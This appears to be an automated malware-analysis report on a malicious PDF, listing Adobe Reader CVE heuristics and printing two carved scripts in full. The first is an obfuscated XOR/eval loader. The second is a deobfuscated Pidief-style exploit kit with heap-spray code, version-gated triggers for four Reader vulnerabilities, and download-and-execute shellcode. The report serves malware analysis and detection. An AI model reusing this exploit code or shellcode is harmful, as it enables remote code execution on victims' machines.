MALICIOUS
408
Risk Score
Malware Insights
MITRE ATT&CK
T1059.001 PowerShell
The PDF file was flagged as malicious by an ML classifier with high confidence. Static analysis revealed embedded JavaScript, indicating an attempt to execute arbitrary code. The presence of JavaScript actions and embedded JS streams strongly suggests the document is designed to exploit vulnerabilities or deliver a payload. The ML classifier's output of 0.999985 further supports the malicious nature of the file.
Machine Learning
- Nyx PDF Classifier malicious score 1.0000
Heuristics 9
-
media.newPlayer — CVE-2009-4324 critical CVE exact CVE_2009_4324PDF JavaScript calls media.newPlayer — CVE-2009-4324 is a use-after-free in Adobe Reader's multimedia plugin triggered by media.newPlayer(). Actively exploited as a zero-day in December 2009. (identified after JavaScript deobfuscation)
-
Collab.getIcon — CVE-2009-0927 critical CVE exact CVE_2009_0927PDF JavaScript calls Collab.getIcon — CVE-2009-0927 is a stack buffer overflow in Adobe Reader triggered by Collab.getIcon() with a crafted argument. Allows arbitrary code execution. (identified after JavaScript deobfuscation)
-
Collab.collectEmailInfo — CVE-2007-5659 critical CVE exact CVE_2007_5659PDF JavaScript calls Collab.collectEmailInfo — CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(). Part of a series of Acrobat JS API exploits. (identified after JavaScript deobfuscation)
-
util.printf — CVE-2008-2992 critical CVE exact CVE_2008_2992PDF JavaScript calls util.printf() — CVE-2008-2992 is a stack buffer overflow in Adobe Reader triggered by a long format-specifier argument. Widely exploited in the wild after disclosure. (identified after JavaScript deobfuscation)
-
Pidief-style multi-CVE JavaScript dispatcher critical CVE likely PDF_PIDIEF_MULTI_CVE_DISPATCHA single JavaScript body branches on app.viewerVersion and invokes two or more of the canonical Reader sinks (Collab.collectEmailInfo, Collab.getIcon, util.printf with a field-width format string). This is the 2009-2010 Pidief.J multi-exploit landing template: a per-version dispatcher that fires the matching CVE chain for whichever Reader version opens the file.
-
Multi-CVE Adobe Reader JavaScript exploit kit critical PDF_ADOBE_READER_MULTI_CVE_JS_KITOne recovered JavaScript stage contains multiple version-gated Adobe Reader exploit branches. This is stronger evidence than independent API keywords: the PDF is selecting old Reader vulnerabilities by viewer version and running heap-sprayed Acrobat JavaScript exploit paths.
-
JavaScript action low 1 related finding PDF_JAVASCRIPTPDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
Embedded JS stream low PDF_JSPDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
javascript_obj0017_000.js |
pdf-javascript-stream | PDF /JS object 17 at offset 0x21D6 | 2618 bytes |
SHA-256: 6ac4125c255b7b84f9d21c435df751ce54a28fc63bd2e05c80dd288a5bbe307a |
|||
Preview scriptFirst 1,000 lines of the extracted script
// fd28ff74f52357a76d2acea40101af3b
var aF=String("%7TY".substr(0,1));
// 8d0db0cf97e5a1e488b15449eeaab8a3
var n=new String("from"+"Char"+"CodeNUyT".substr(0,4));
// ea25dbaf0d3c948cc59f33fb134d155d
var h=this;
// 5a290bfd75f7e4bb5839d5e0718c02a3
var t="charC"+"odeAt";
// e7240a36066073e17978ca887ae96a09
var nK=String("cha"+"rCo"+"deA"+"t");
// 9321539bee282029d7a004569d632658
var oZ=String;
// 3c381486bc905aba92c67a105491763c
var d=String("eval7zi".substr(0,4));
// 6899ab40ed64825db102c696eb9d01be;
// f2ac82719b46d54d7ff9097991ce4759
var r="le6NJh".substr(0,2)+"ngTso".substr(0,2)+"vsCthsvC".substr(3,2);
// ff2413d6eae1c7c4093efe9b644c0e0a
var f="get"+"Pag7UT".substr(0,3)+"eNuzxfn".substr(0,3)+"pCrmWoCpr".substr(3,3)+"rds";
// 7a9c8a7c1ebcce1282e33448a3161832
var rE=65;
// 1be33e0b8cb2fcd43bd851aba69136b5
var iH=3;
// 29f550c018464a83475c1823c21b4d4d
var x="geu0o".substr(0,2)+"tP"+"ag"+"jfFeNjFf".substr(3,2)+"th"+"E5gWoEg5".substr(3,2)+"rd";
// c634aa7f0370ff1238c1892546cbad79
var p=66-64;
// 33f88d15273e192864f0ec0f5da4faea
var tO=59-58;
// 7840745b1e3cec49d7db7ad5bd98f025
var cP=String("unesc"+"ape");
// cb451f9cb1d295b73a26f97af8363704
var rQ="su5biN".substr(0,2)+"bskjQ".substr(0,2)+"tr";
// 28f241c9bbed6162c7ed3e6d9f27e5cb
var gV=100-100;
// 8bf1019fd650d622345301fdd8ca1269
function xG(gX,pU){return gX[t](pU)};
// 48a8704b3c037fae744531f5848c06ec
var eH=h[cP];
// a0f057c00cb7706f451235045092a2d7
var nK=h[nK];
// e9d1197b54f76ccf4d59f56588192f89
function z(v,pU){return v[rQ](pU,p)};
// 8b2b2004c4b88080abb06ced8c9f1b82
function pA(v,uP){return v[uP]};
// b38db2f6e39751282581f45d6f1ca9dd
function tQ(kN,rM){return kN-rM};
// 3b7ae776726362c5c6170a1d4ce00111
function mZ(l){return h[x](iH,l)};
// 35070009ae522d04a88c37fd25df0be9
function dI(v){return v[r]-p};
// 1e7da0784c042d77b278fdd402003ff7
function qZ(kN,rM){return kN+rM};
// 3c315d93c64995783b4cb48025334ece;
// 350f71a77cf4985855cdec10a1db64bc
var j=h[d];
// bfd5f3b906b9f8bf50ab5eadc37568ee
function xU(iT,nM){return iT^nM;};
// 332a0f79cfb4a27c56be3c4ff369955d
var eJ=new oZ();
// ed9141084350c29ad7f1aef7a6538b1d
var nC=h[f](iH);
// 9781e638b759ed9b8d40e26b45a9eceb
function kR(l){
// f3eda36df7ebd94f6ffae92d9440bdb3
var nQ=mZ(l);
// eff1db99c6aecfb001d466eaaf18f41a
pU=dI(nQ);
// cc6a057d966e3e55cb1e94ff2fab1f66
mN=z(nQ,pU);
// 82e03bc07fa392c82cada6c7512cf6ee
vG = eH(qZ(aF,mN));return xG(vG,gV);};for(var l=gV;l<nC;l++){
// 0db8baf7da1198dcb8e66cd33deaabbd
var uB=kR(l);
// de310d2d6f82b1a7960d3bded6afbc78
var xE=xU(uB,rE);
// 1bb8108b01668767b981049d21733bf5
eJ+=pA(oZ,n)(xE);
// ee14a2687afce05bcde50f8c337c6324
}j(eJ);
|
|||
legacy_pdfkit_stage_000.js |
deobfuscated-js | getPageWords-XOR Pidief stage normalized at offset 0x0 | 3786 bytes |
SHA-256: be80c24dba0c736c107fba47b55dc93de17b9c84bfa2988c4deda791c6e9bed6 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 6 eval/decoder/string-building token(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
���������
var src_table = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ01234567890/.:_-?&=%';
var dest_table= 'JQ2cS-uPHtBa/gCNDfU6Ej:lwxnM1L0k&sOI9imTpqXbd3GA%?0WY48y_V.ZvrRFe7zhKo5=';
var hwTl9Dn = new Array();
function get_shellcode(name) {
var u = get_url();
u = for_unescape(u);
var s = "%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033%u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60%u0455";
s+= u;
return unescape(s);
}
function get_url(){
var str = this.info.author;
var ret = encode_str(str, dest_table, src_table);
return ret;
};
function encode_str(str, src_table, dest_table){
var ret="";
for(var i=0; i < str.length; i++)
{
var index = src_table.indexOf(str[i]);
if(index > -1 )
{
ret += dest_table[index];
}
}
return ret;
};
function for_unescape(str)
{
var out = "";
str = bin2hex(str);
g = Math.round(str.length / 4);
if (g != str.length /4) str+="00";
for(var i=0; i < str.length; i+=4)
{
out+="%u" + str.substr(i+2, 2) + str.substr(i, 2);
}
return out;
}
function bin2hex (s){
var i, f = 0, a = [];
s += '';
f = s.length;
for (i = 0; i<f; i++) {
a[i] = s.charCodeAt(i).toString(16).replace(/^([\da-f])$/,"0$1").toUpperCase();
}
return a.join('');
}
function Rq4v1qCC(PDrScZj4, ez5pL6){
while (PDrScZj4.length * 2 < ez5pL6){
PDrScZj4 += PDrScZj4;
}
PDrScZj4 = PDrScZj4.substring(0, ez5pL6 / 2); return PDrScZj4;
}
function x8EvTm(I7T0vko5){
var qPBt7D = 0x0c0c0c0c;
NRjjR6W6 = get_shellcode("pdf");
if (I7T0vko5 == 1){qPBt7D = 0x30303030;}
var FeQq1Vv = 0x400000;
var tsSzSc = NRjjR6W6.length * 2; var ez5pL6 = FeQq1Vv - (tsSzSc + 0x38);
var PDrScZj4 = unescape("%u9090%u9090");
PDrScZj4 = Rq4v1qCC(PDrScZj4, ez5pL6);
var x62RaBM3 = (qPBt7D - 0x400000) / FeQq1Vv;
for (var Ojafoj = 0; Ojafoj < x62RaBM3; Ojafoj ++ ){
hwTl9Dn[Ojafoj] = PDrScZj4 + NRjjR6W6;
}
}
function U2UcYKr(){
var IyIFVe = app.viewerVersion.toString();
if (IyIFVe > 8)
{
x8EvTm(1);
var iVvCdy8 = "12999999999999999999";
for (RvU5gmOE = 0; RvU5gmOE < 276; RvU5gmOE ++ )
{
iVvCdy8 += "8";
}
util.printf("%45000f", iVvCdy8);
}
if (IyIFVe < 8){
x8EvTm(0);
var UNXaCTHb = unescape("%u0c0c%u0c0c");
while (UNXaCTHb.length < 44952) UNXaCTHb += UNXaCTHb;
this .collabStore = Collab.collectEmailInfo({ subj : "", msg : UNXaCTHb});
}
if (IyIFVe < 9.1){
if (app.doc.Collab.getIcon)
{
x8EvTm(0);
var eGREUTNw = unescape("%09");
while (eGREUTNw.length < 0x4000)eGREUTNw += eGREUTNw;
eGREUTNw = "N." + eGREUTNw;
app.doc.Collab.getIcon(eGREUTNw);
}
}
if (IyIFVe == 9.2){
x8EvTm(1);
var sf="1.000000000.000000000.1337 : 3.13.37";
util.printd(sf, new Date());
try {
media.newPlayer(null);
} catch(e) {}
util.printd(sf, new Date());
}
}
U2UcYKr();
����������������QQ�NIQQ�NI
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.